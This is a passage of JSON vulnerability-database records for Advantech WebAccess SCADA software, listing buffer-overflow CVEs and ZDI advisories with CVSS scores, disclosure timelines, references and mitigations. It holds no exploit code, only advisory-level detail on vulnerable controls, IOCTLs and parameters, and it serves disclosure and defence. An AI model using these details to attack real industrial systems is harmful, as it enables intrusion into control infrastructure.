"Top\u00a0Page", "trust": 0.8, "url": "https://www.advantech.com/" }, { "title": "Patch for Advantech WebAccess Heap Buffer Overflow Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/294871" }, { "title": "Advantech WebAccess Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=166738" } ], "sources": [ { "db": "ZDI", "id": "ZDI-22-258" }, { "db": "ZDI", "id": "ZDI-22-257" }, { "db": "CNVD", "id": "CNVD-2021-80267" }, { "db": "JVNDB", "id": "JVNDB-2021-013714" }, { "db": "CNNVD", "id": "CNNVD-202110-897" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-787", "trust": 1.1 }, { "problemtype": "CWE-122", "trust": 1.0 }, { "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "VULHUB", "id": "VHN-393009" }, { "db": "JVNDB", "id": "JVNDB-2021-013714" }, { "db": "NVD", "id": "CVE-2021-33023" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.0, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-285-02" }, { "trust": 2.2, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-21-285-02" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33023" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu97189148/index.html" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2021.3440" }, { "trust": 0.6, "url": "https://www.zerodayinitiative.com/advisories/zdi-22-257/" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021101312" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/787.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "ZDI", "id": "ZDI-22-258" }, { "db": "ZDI", "id": "ZDI-22-257" }, { "db": "CNVD", "id": "CNVD-2021-80267" }, { "db": "VULHUB", "id": "VHN-393009" }, { "db": "VULMON", "id": "CVE-2021-33023" }, { "db": "JVNDB", "id": "JVNDB-2021-013714" }, { "db": "CNNVD", "id": "CNNVD-202110-897" }, { "db": "NVD", "id": "CVE-2021-33023" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-22-258" }, { "db": "ZDI", "id": "ZDI-22-257" }, { "db": "CNVD", "id": "CNVD-2021-80267" }, { "db": "VULHUB", "id": "VHN-393009" }, { "db": "VULMON", "id": "CVE-2021-33023" }, { "db": "JVNDB", "id": "JVNDB-2021-013714" }, { "db": "CNNVD", "id": "CNNVD-202110-897" }, { "db": "NVD", "id": "CVE-2021-33023" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-02-02T00:00:00", "db": "ZDI", "id": "ZDI-22-258" }, { "date": "2022-02-02T00:00:00", "db": "ZDI", "id": "ZDI-22-257" }, { "date": "2021-10-26T00:00:00", "db": "CNVD", "id": "CNVD-2021-80267" }, { "date": "2021-10-18T00:00:00", "db": "VULHUB", "id": "VHN-393009" }, { "date": "2021-10-18T00:00:00", "db": "VULMON", "id": "CVE-2021-33023" }, { "date": "2022-09-27T00:00:00", "db": "JVNDB", "id": "JVNDB-2021-013714" }, { "date": "2021-10-12T00:00:00", "db": "CNNVD", "id": "CNNVD-202110-897" }, { "date": "2021-10-18T13:15:09.437000", "db": "NVD", "id": "CVE-2021-33023" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-02-02T00:00:00", "db": "ZDI", "id": "ZDI-22-258" }, { "date": "2022-02-02T00:00:00", "db": "ZDI", "id": "ZDI-22-257" }, { "date": "2022-01-18T00:00:00", "db": "CNVD", "id": "CNVD-2021-80267" }, { "date": "2021-10-20T00:00:00", "db": "VULHUB", "id": "VHN-393009" }, { "date": "2021-10-20T00:00:00", "db": "VULMON", "id": "CVE-2021-33023" }, { "date": "2022-09-27T02:16:00", "db": "JVNDB", "id": "JVNDB-2021-013714" }, { "date": "2022-02-07T00:00:00", "db": "CNNVD", "id": "CNNVD-202110-897" }, { "date": "2021-10-20T22:16:01.683000", "db": "NVD", "id": "CVE-2021-33023" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202110-897" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess IOCTL 0x2722 Heap-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-22-258" }, { "db": "ZDI", "id": "ZDI-22-257" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-202110-897" } ], "trust": 0.6 } }
var-201708-1722
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-530" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-530" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-530", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-530", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-530" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within TpMegaJVT.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-530" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4087", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-530", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-530" } ] }, "id": "VAR-201708-1722", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:45:11.781000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\BF28239A-3823-40FF-BC02-2DA4D9DBB1EEIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-530" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-530" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-530", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-530", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-530", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess TpMegaJVT startSoundRecord Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-530" } ], "trust": 0.7 } }
var-201602-0457
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C7C IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf with the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. Advantech WebAccess is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed attacks will likely cause denial-of-service conditions
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 3.5, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-134" }, { "db": "ZDI", "id": "ZDI-16-136" }, { "db": "ZDI", "id": "ZDI-16-135" }, { "db": "ZDI", "id": "ZDI-16-133" }, { "db": "ZDI", "id": "ZDI-16-130" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-134" }, { "db": "ZDI", "id": "ZDI-16-136" }, { "db": "ZDI", "id": "ZDI-16-135" }, { "db": "ZDI", "id": "ZDI-16-133" }, { "db": "ZDI", "id": "ZDI-16-130" }, { "db": "BID", "id": "83020" } ], "trust": 3.8 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-134", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-136", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-135", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-133", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-130", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-134", "trust": 0.7, "value": "HIGH" }, { "author": "ZDI", "id": "ZDI-16-136", "trust": 0.7, "value": "HIGH" }, { "author": "ZDI", "id": "ZDI-16-135", "trust": 0.7, "value": "HIGH" }, { "author": "ZDI", "id": "ZDI-16-133", "trust": 0.7, "value": "HIGH" }, { "author": "ZDI", "id": "ZDI-16-130", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-134" }, { "db": "ZDI", "id": "ZDI-16-136" }, { "db": "ZDI", "id": "ZDI-16-135" }, { "db": "ZDI", "id": "ZDI-16-133" }, { "db": "ZDI", "id": "ZDI-16-130" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C7C IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf with the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. Advantech WebAccess is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. Failed attacks will likely cause denial-of-service conditions", "sources": [ { "db": "ZDI", "id": "ZDI-16-134" }, { "db": "ZDI", "id": "ZDI-16-136" }, { "db": "ZDI", "id": "ZDI-16-135" }, { "db": "ZDI", "id": "ZDI-16-133" }, { "db": "ZDI", "id": "ZDI-16-130" }, { "db": "BID", "id": "83020" } ], "trust": 3.42 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-16-134", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-136", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-135", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-133", "trust": 1.0 }, { "db": "ZDI", "id": "ZDI-16-130", "trust": 1.0 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3167", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3163", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3248", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3160", "trust": 0.7 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3153", "trust": 0.7 }, { "db": "BID", "id": "83020", "trust": 0.3 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-134" }, { "db": "ZDI", "id": "ZDI-16-136" }, { "db": "ZDI", "id": "ZDI-16-135" }, { "db": "ZDI", "id": "ZDI-16-133" }, { "db": "ZDI", "id": "ZDI-16-130" }, { "db": "BID", "id": "83020" } ] }, "id": "VAR-201602-0457", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:51:03.689000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 3.5, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-134" }, { "db": "ZDI", "id": "ZDI-16-136" }, { "db": "ZDI", "id": "ZDI-16-135" }, { "db": "ZDI", "id": "ZDI-16-133" }, { "db": "ZDI", "id": "ZDI-16-130" } ] }, "references": { "_id": null, "data": [ { "trust": 3.5, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" }, { "trust": 0.3, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-130" }, { "trust": 0.3, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-133" }, { "trust": 0.3, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-134" }, { "trust": 0.3, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-135" }, { "trust": 0.3, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-136" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-134" }, { "db": "ZDI", "id": "ZDI-16-136" }, { "db": "ZDI", "id": "ZDI-16-135" }, { "db": "ZDI", "id": "ZDI-16-133" }, { "db": "ZDI", "id": "ZDI-16-130" }, { "db": "BID", "id": "83020" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-16-134", "ident": null }, { "db": "ZDI", "id": "ZDI-16-136", "ident": null }, { "db": "ZDI", "id": "ZDI-16-135", "ident": null }, { "db": "ZDI", "id": "ZDI-16-133", "ident": null }, { "db": "ZDI", "id": "ZDI-16-130", "ident": null }, { "db": "BID", "id": "83020", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-134", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-136", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-135", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-133", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-130", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "BID", "id": "83020", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-134", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-136", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-135", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-133", "ident": null }, { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-130", "ident": null }, { "date": "2016-07-06T12:17:00", "db": "BID", "id": "83020", "ident": null } ] }, "threat_type": { "_id": null, "data": "network", "sources": [ { "db": "BID", "id": "83020" } ], "trust": 0.3 }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll ProjectName/NodeName sprintf Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-136" }, { "db": "ZDI", "id": "ZDI-16-133" }, { "db": "ZDI", "id": "ZDI-16-130" } ], "trust": 2.1 }, "type": { "_id": null, "data": "Boundary Condition Error", "sources": [ { "db": "BID", "id": "83020" } ], "trust": 0.3 } }
var-201404-0539
Vulnerability from variot
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long NodeName parameter. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied NodeName string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.2, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "5.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "6.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "7.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.6, "vendor": "advantech webaccess", "version": "*" }, { "_id": null, "model": "broadwin webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.0" } ], "sources": [ { "db": "IVD", "id": "2b34b2f8-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1645f628-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7c1a80-463f-11e9-a220-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-14-076" }, { "db": "CNVD", "id": "CNVD-2014-02262" }, { "db": "BID", "id": "66718" }, { "db": "JVNDB", "id": "JVNDB-2014-001975" }, { "db": "CNNVD", "id": "CNNVD-201404-170" }, { "db": "NVD", "id": "CVE-2014-0764" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-001975" } ] }, "credits": { "_id": null, "data": "Tom Gallagher", "sources": [ { "db": "ZDI", "id": "ZDI-14-076" } ], "trust": 0.7 }, "cve": "CVE-2014-0764", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2014-0764", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 2.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-02262", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "2b34b2f8-1edf-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "1645f628-2352-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "7d7c1a80-463f-11e9-a220-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-68257", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-0764", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2014-0764", "trust": 0.8, "value": "High" }, { "author": "ZDI", "id": "CVE-2014-0764", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2014-02262", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201404-170", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "2b34b2f8-1edf-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "1645f628-2352-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "HIGH" }, { "author": "IVD", "id": "7d7c1a80-463f-11e9-a220-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-68257", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "2b34b2f8-1edf-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "1645f628-2352-11e6-abef-000c29c66e3d" }, { "db": "IVD", "id": "7d7c1a80-463f-11e9-a220-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-14-076" }, { "db": "CNVD", "id": "CNVD-2014-02262" }, { "db": "VULHUB", "id": "VHN-68257" }, { "db": "JVNDB", "id": "JVNDB-2014-001975" }, { "db": "CNNVD", "id": "CNNVD-201404-170" }, { "db": "NVD", "id": "CVE-2014-0764" } ] }, "description": { "_id": null, "data": "Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long NodeName parameter. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied NodeName string before copying it into a fixed length buffer on the 